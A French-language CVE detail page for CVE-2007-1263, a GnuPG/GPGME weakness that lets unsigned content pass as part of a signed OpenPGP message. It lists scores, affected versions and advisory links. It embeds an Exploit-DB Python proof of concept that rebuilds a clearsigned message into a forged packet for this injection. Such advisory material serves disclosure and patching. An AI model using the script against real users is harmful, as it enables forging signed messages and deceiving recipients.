CVE-2007-1263 : Détail

CVE-2007-1263

34.77%V3
Network
2007-03-06
19h00 +00:00
2018-10-16
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

GnuPG 1.4.6 and earlier and GPGME before 1.1.4, when run from the command line, does not visually distinguish signed and unsigned portions of OpenPGP messages with multiple components, which might allow remote attackers to forge the contents of a message without detection.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 5 AV:N/AC:L/Au:N/C:N/I:P/A:N [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 29689

Date de publication : 2007-03-04 23h00 +00:00
Auteur : Gerardo Richarte
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/22757/info GnuPG is prone to a weakness that may allow an attacker to add arbitrary content into a message without the end user knowing. An attacker may be able to exploit this issue in applications using GnuPG to add arbitrary content into a signed and/or encrypted message. Exploiting this issue depends on the individual application's use of GnuPG. Individual records will be created detailing this issue in affected applications. #!/usr/bin/python import os, gpg, sys, base64 clear_sign = open(sys.argv[1], "rb").read().splitlines() start = clear_sign.index("-----BEGIN PGP SIGNED MESSAGE-----") mid = clear_sign.index("-----BEGIN PGP SIGNATURE-----") end = clear_sign.index("-----END PGP SIGNATURE-----") text = '\r\n'.join(clear_sign[start+3:mid]) sign = '\n'.join(clear_sign[mid+3:end-1]) onepass = gpg.OnePassSignature() onepass['keyid'] = (0x12341234,0x12341234) onepass['digest_algo'] = 2 onepass['pubkey_algo'] = 1 onepass['sigclass'] = 1 plain1 = gpg.Plaintext() plain1['name'] = 'original' plain1['data'] = text plain1['mode'] = 0x62 signature = gpg.Raw() signature['data'] = base64.decodestring(sign) compressed = gpg.Compressed() compressed['algorithm'] = gpg.COMPRESS_ALGO_ZLIB compressed['data'] = [onepass, plain1, signature] pkt = gpg.Packet() pkt['version'] = 1 pkt['data'] = compressed os.write(1,str(pkt))

Products Mentioned

Configuraton 0

Gnu>>Gpgme >> Version To (including) 1.1.3

Gnupg>>Gnupg >> Version To (including) 1.4.6

Références

http://www.trustix.org/errata/2007/0009/
Tags : vendor-advisory, x_refsource_TRUSTIX
http://fedoranews.org/cms/node/2776
Tags : vendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/24407
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24438
Tags : third-party-advisory, x_refsource_SECUNIA
http://fedoranews.org/cms/node/2775
Tags : vendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/24650
Tags : third-party-advisory, x_refsource_SECUNIA
http://securityreason.com/securityalert/2353
Tags : third-party-advisory, x_refsource_SREASON
http://www.redhat.com/support/errata/RHSA-2007-0107.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.debian.org/security/2007/dsa-1266
Tags : vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/24511
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-432-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/24734
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24419
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24544
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-432-2
Tags : vendor-advisory, x_refsource_UBUNTU
http://secunia.com/advisories/24420
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24875
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/24365
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDKSA-2007:059
Tags : vendor-advisory, x_refsource_MANDRIVA
http://www.redhat.com/support/errata/RHSA-2007-0106.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.securityfocus.com/bid/22757
Tags : vdb-entry, x_refsource_BID
http://www.securitytracker.com/id?1017727
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2007/0835
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/24489
Tags : third-party-advisory, x_refsource_SECUNIA